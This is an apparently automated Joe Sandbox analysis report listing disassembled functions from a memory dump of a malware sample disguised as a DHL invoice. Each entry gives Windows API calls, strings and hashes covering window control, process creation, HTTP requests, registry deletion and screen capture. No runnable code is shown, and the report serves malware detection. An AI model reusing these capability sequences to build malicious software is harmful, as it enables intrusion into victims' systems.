Instruction Fuzzy Hash: 9381E571A71207BBEB29EF64DC42FBE3BA8AF24600F044014FE15AA1D5EBB0D551C7A1

Function 012A5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 012A5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 012A5A40
SetWindowTextW.USER32 ref: 012A5A57
GetDlgItem.USER32(?,000003EA), ref: 012A5A6C
SetWindowTextW.USER32 ref: 012A5A72
GetDlgItem.USER32(?,000003E9), ref: 012A5A82
SetWindowTextW.USER32 ref: 012A5A88
SendDlgItemMessageW.USER32 ref: 012A5AA9
SendDlgItemMessageW.USER32 ref: 012A5AC3
GetWindowRect.USER32(?,?), ref: 012A5ACC
_wcslen.LIBCMT ref: 012A5B33
SetWindowTextW.USER32 ref: 012A5B6F
GetDesktopWindow.USER32 ref: 012A5B75
GetWindowRect.USER32(00000000), ref: 012A5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 012A5BD3
GetClientRect.USER32 ref: 012A5BE0
PostMessageW.USER32 ref: 012A5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 012A5C2F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 3882e1f58d76c3118d5cb8c44bc556247a8bf7d4467df92ce5483c76014c74f6
Instruction ID: 96c8e622fa6f4d60676342262d6f8a5012767efffeeea458204b37e611529da7
Opcode Fuzzy Hash: 3882e1f58d76c3118d5cb8c44bc556247a8bf7d4467df92ce5483c76014c74f6
Instruction Fuzzy Hash: 08717B31A1070AAFDB20DFA8CE89AAFBBF5FF48705F50491CE242A2594D774A954CF50

Function 012600C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 012600C6

Part of subcall function 012600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0131070C,00000FA0,6650BE79,?,?,?,?,012823B3,000000FF), ref: 0126011C
Part of subcall function 012600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,012823B3,000000FF), ref: 01260127
Part of subcall function 012600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,012823B3,000000FF), ref: 01260138
Part of subcall function 012600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,012823B3,000000FF), ref: 0126014E
Part of subcall function 012600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,012823B3,000000FF), ref: 0126015C
Part of subcall function 012600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,012823B3,000000FF), ref: 0126016A
Part of subcall function 012600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 01260195
Part of subcall function 012600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 012601A0

___scrt_fastfail.LIBCMT ref: 012600E7

Part of subcall function 012600A3: __onexit.LIBCMT ref: 012600A9

Strings

WakeAllConditionVariable, xrefs: 01260162
SleepConditionVariableCS, xrefs: 01260154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 01260122
InitializeConditionVariable, xrefs: 01260148
kernel32.dll, xrefs: 01260133

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: c6bae8ad0d39a571a8c1203c73952f534a91e8664a793a340e99fff97392098e
Instruction ID: 1290461951286d68d1a3c9aec2721b5a65e28c4b97c428addcf7bfabe7cabc1f
Opcode Fuzzy Hash: c6bae8ad0d39a571a8c1203c73952f534a91e8664a793a340e99fff97392098e
Instruction Fuzzy Hash: CA210B32A65712ABE7255BB9F949B29379CDB45E51F00012DFE02D22C4DF708840DBA8

Function 012A30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012A318D
_wcslen.LIBCMT ref: 012A31F8

Strings

TEXT, xrefs: 012A347C
CLASS, xrefs: 012A3188, 012A31A5
NAME, xrefs: 012A3335, 012A3346
CLASSNN, xrefs: 012A31F3, 012A3204
REGEXPCLASS, xrefs: 012A3255, 012A3266
INSTANCE, xrefs: 012A3453

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: b0f897bbbaaecbfcda7b29caaab81ffa815766c5681cb3503bbf158dc97bbe62
Instruction ID: f78650ea1a10ac54f6d8cc154f701436e2aba054086a21d47c865db53ce1dd51
Opcode Fuzzy Hash: b0f897bbbaaecbfcda7b29caaab81ffa815766c5681cb3503bbf158dc97bbe62
Instruction Fuzzy Hash: 03E1F132A20617ABDB19DFBCC4516FDFBB4BF14710F94811AD656E3280DB30A989CB90

Function 012B44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000), ref: 012B4527
_wcslen.LIBCMT ref: 012B453B
_wcslen.LIBCMT ref: 012B4599
_wcslen.LIBCMT ref: 012B45F4
_wcslen.LIBCMT ref: 012B463F
_wcslen.LIBCMT ref: 012B46A7

Part of subcall function 0125F9F2: _wcslen.LIBCMT ref: 0125F9FD

GetDriveTypeW.KERNEL32(?,01306BF0,00000061), ref: 012B4743

Strings

cdrom, xrefs: 012B458F, 012B4594
removable, xrefs: 012B45EA, 012B45EF
all, xrefs: 012B4531, 012B4536
network, xrefs: 012B469D, 012B46A2
ramdisk, xrefs: 012B46F1
fixed, xrefs: 012B4635, 012B463A
unknown, xrefs: 012B4708

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: d591ee1d5aab379e810ef81f42f9156955e1e591b65e9587a2d9c00bc452365a
Instruction ID: bdfb46ce00b40933c21748806b52ca4f744b103231ae7204db20bc6c93b60d5a
Opcode Fuzzy Hash: d591ee1d5aab379e810ef81f42f9156955e1e591b65e9587a2d9c00bc452365a
Instruction Fuzzy Hash: D4B113716283839FC714EF28D8D0ABAB7E4AFA47A4F50491DF69787292D730D844CB52

Function 012CAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012CB198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 012CB1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 012CB1D4
_wcslen.LIBCMT ref: 012CB200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 012CB214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 012CB236
_wcslen.LIBCMT ref: 012CB332

Part of subcall function 012B05A7: GetStdHandle.KERNEL32(000000F6), ref: 012B05C6

_wcslen.LIBCMT ref: 012CB34B
_wcslen.LIBCMT ref: 012CB366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 012CB3B6
GetLastError.KERNEL32(00000000), ref: 012CB407
CloseHandle.KERNEL32(?), ref: 012CB439
CloseHandle.KERNEL32(00000000), ref: 012CB44A
CloseHandle.KERNEL32(00000000), ref: 012CB45C
CloseHandle.KERNEL32(00000000), ref: 012CB46E
CloseHandle.KERNEL32(?), ref: 012CB4E3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: e700d586a1d0ec67f4e6d20bba81d3deb703a82a4d8225bd1e15349eaddd86b1
Instruction ID: 66ec6d7a9c2a1acc1b60f07514336e26cf54e9e5724e4d41f332f3d98f3f86c0
Opcode Fuzzy Hash: e700d586a1d0ec67f4e6d20bba81d3deb703a82a4d8225bd1e15349eaddd86b1
Instruction Fuzzy Hash: 84F1D131524342DFD725EF28C491B2EBBE5EF85B50F148A5DEA994B2A1CB31EC40CB52

Function 0124326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(01311990), ref: 01282F8D
GetMenuItemCount.USER32(01311990), ref: 0128303D
GetCursorPos.USER32(?), ref: 01283081
SetForegroundWindow.USER32(00000000), ref: 0128308A
TrackPopupMenuEx.USER32 ref: 0128309D
PostMessageW.USER32 ref: 012830A9

Strings

0, xrefs: 0124327D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: b2c6e49c0785dd054c96c9fb52e937fbdb6abe1ba681f816165286f1e4765210
Instruction ID: f96f8095de0dd88a280bffb6d7f1705eede676582ded4ee87244eb4995009e7a
Opcode Fuzzy Hash: b2c6e49c0785dd054c96c9fb52e937fbdb6abe1ba681f816165286f1e4765210
Instruction Fuzzy Hash: ED71E370661216BFFB25DF28DC49FAABF69FF04324F104216F6146A1D0C7B1A810CB90

Function 012D6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 012D6DEB

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

CreateWindowExW.USER32 ref: 012D6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 012D6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 012D6E94
DestroyWindow.USER32 ref: 012D6EB5
CreateWindowExW.USER32 ref: 012D6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 012D6EFD
GetDesktopWindow.USER32 ref: 012D6F16
GetWindowRect.USER32(00000000), ref: 012D6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 012D6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 012D6F4D

Part of subcall function 01259944: GetWindowLongW.USER32(?,000000EB), ref: 01259952

Strings

tooltips_class32, xrefs: 012D6E58, 012D6EDD
0, xrefs: 012D6D98

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 887475a2b9a16320d85fe5a5df03b28fa46c41463f7b21d8e9aea6a534e0797b
Instruction ID: efc985935e2e6fa3a88ec1e94a27db156f44b6077ea58685c89146da9ffe639f
Opcode Fuzzy Hash: 887475a2b9a16320d85fe5a5df03b28fa46c41463f7b21d8e9aea6a534e0797b
Instruction Fuzzy Hash: 68717770514242AFEB25CF2CD848FBABBF9FB89304F44055DFA9987260D770A905CB51

Function 012D911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 01259BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 01259BB2

DragQueryPoint.SHELL32(?,?), ref: 012D9147

Part of subcall function 012D7674: ClientToScreen.USER32(?,?), ref: 012D769A
Part of subcall function 012D7674: GetWindowRect.USER32(?,?), ref: 012D7710
Part of subcall function 012D7674: PtInRect.USER32(?,?,012D8B89), ref: 012D7720

SendMessageW.USER32(?,000000B0,?,?), ref: 012D91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 012D91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 012D91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 012D9225
SendMessageW.USER32(?,000000B0,?,?), ref: 012D923E
SendMessageW.USER32(?,000000B1,?,?), ref: 012D9255
SendMessageW.USER32(?,000000B1,?,?), ref: 012D9277
DragFinish.SHELL32(?), ref: 012D927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 012D9371

Strings

@GUI_DRAGID, xrefs: 012D92E9
@GUI_DROPID, xrefs: 012D929E
@GUI_DRAGFILE, xrefs: 012D9320

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: ea36b61cde03bc2fe1dd883378503a04b6d86f7cd5978e8a3eac658c11781666
Instruction ID: 90542ec7e51bf961cac38835d407b4a2de8f769ec30c4fc959aaae56ad1c1e33
Opcode Fuzzy Hash: ea36b61cde03bc2fe1dd883378503a04b6d86f7cd5978e8a3eac658c11781666
Instruction Fuzzy Hash: 26619B71518302AFD715DF64D888DAFBBE8FF98754F00091EF595931A0DB30AA49CB92

Function 012BC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 012BC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 012BC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 012BC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 012BC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 012BC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 012BC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 012BC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 012BC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 012BC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 012BC5F0
InternetCloseHandle.WININET(00000000), ref: 012BC5FB

Strings

, xrefs: 012BC575

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 33448475295c633d29d1a293f747763864eb5e1f90c47b324697db06cd7ca76a
Instruction ID: 7ac45f44206a6802e05e073f40675894a4fb0f269f706384d8ac41fe62a3d5af
Opcode Fuzzy Hash: 33448475295c633d29d1a293f747763864eb5e1f90c47b324697db06cd7ca76a
Instruction Fuzzy Hash: B1513AB1511209AFEB218F64D988AAA7BBCEB08794F00441EFA45A6240DB74DA64DB60

Function 012D856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 012D8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 012D85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 012D85AD
CloseHandle.KERNEL32(00000000), ref: 012D85BA
GlobalLock.KERNEL32 ref: 012D85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012D85D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 012D85E0
CloseHandle.KERNEL32(00000000), ref: 012D85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 012D85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,012DFC38,?), ref: 012D8611
GlobalFree.KERNEL32(00000000), ref: 012D8621
GetObjectW.GDI32(?,00000018,?), ref: 012D8641
CopyImage.USER32 ref: 012D8671
DeleteObject.GDI32(?), ref: 012D8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 012D86AF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: be336ddcabbb20f2b4d8a376b97ab0cbc24fcf9ef0d15bf9097d77e8cd8f566e
Instruction ID: 8b7227580ee6d84147dcf8579387aaac9107c0d68f052f6a24181f8988a2e264
Opcode Fuzzy Hash: be336ddcabbb20f2b4d8a376b97ab0cbc24fcf9ef0d15bf9097d77e8cd8f566e
Instruction Fuzzy Hash: A8412875A01205AFDB219FA9EC4CEAE7BBCEF89B11F104158FA09E7250D770A911CB60

Function 012B14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 012B1502
VariantCopy.OLEAUT32(?,?), ref: 012B150B
VariantClear.OLEAUT32(?), ref: 012B1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 012B15FB
VarR8FromDec.OLEAUT32(?,?), ref: 012B1657
VariantInit.OLEAUT32(?), ref: 012B1708
SysFreeString.OLEAUT32(?), ref: 012B178C
VariantClear.OLEAUT32(?), ref: 012B17D8
VariantClear.OLEAUT32(?), ref: 012B17E7
VariantInit.OLEAUT32(00000000), ref: 012B1823

Strings

Default, xrefs: 012B16AF
%4d%02d%02d%02d%02d%02d, xrefs: 012B1625

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: d1e3676841ab5f3367caf97889ac4eababb148fece745716158812979e568dab
Instruction ID: 2e155e29cb5e6b06a4bfcc6e0d14c48160ab6660770de470d41800495d59d7a7
Opcode Fuzzy Hash: d1e3676841ab5f3367caf97889ac4eababb148fece745716158812979e568dab
Instruction Fuzzy Hash: 3BD10572A20116DBDB14AF69F8D5BBDB7B5FF05740F08815AE907AB180DB70D860CBA1

Function 012CB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Part of subcall function 012CC998: CharUpperBuffW.USER32(?,?), ref: 012CC9B5
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CC9F1
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CCA68
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 012CB6F4
RegOpenKeyExW.ADVAPI32 ref: 012CB772
RegDeleteValueW.ADVAPI32 ref: 012CB80A
RegCloseKey.ADVAPI32(?), ref: 012CB87E
RegCloseKey.ADVAPI32(?), ref: 012CB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 012CB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 012CB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 012CB922
FreeLibrary.KERNEL32(00000000), ref: 012CB983
RegCloseKey.ADVAPI32(00000000), ref: 012CB994

Strings

RegDeleteKeyExW, xrefs: 012CB8FE
advapi32.dll, xrefs: 012CB8ED

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: e394ee2d484f224131269f60b95c9edfc073a69861167d7b90da2c0cd7bdee2e
Instruction ID: 4e3ccc13b14b8f03e854fb8b64111181e668af95022d25c539ce6ac34532fa01
Opcode Fuzzy Hash: e394ee2d484f224131269f60b95c9edfc073a69861167d7b90da2c0cd7bdee2e
Instruction Fuzzy Hash: C6C1D234225242AFD714DF18C495F2ABBE0FF84748F14865CE69A8B3A2CB71E845CF81

Function 012C255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 012C25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 012C25E8
CreateCompatibleDC.GDI32(?), ref: 012C25F4
SelectObject.GDI32(00000000,?), ref: 012C2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 012C266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 012C26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 012C26D0
SelectObject.GDI32(?,?), ref: 012C26D8
DeleteObject.GDI32(?), ref: 012C26E1
DeleteDC.GDI32(?), ref: 012C26E8
ReleaseDC.USER32(00000000,?), ref: 012C26F3

Strings

(, xrefs: 012C268D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

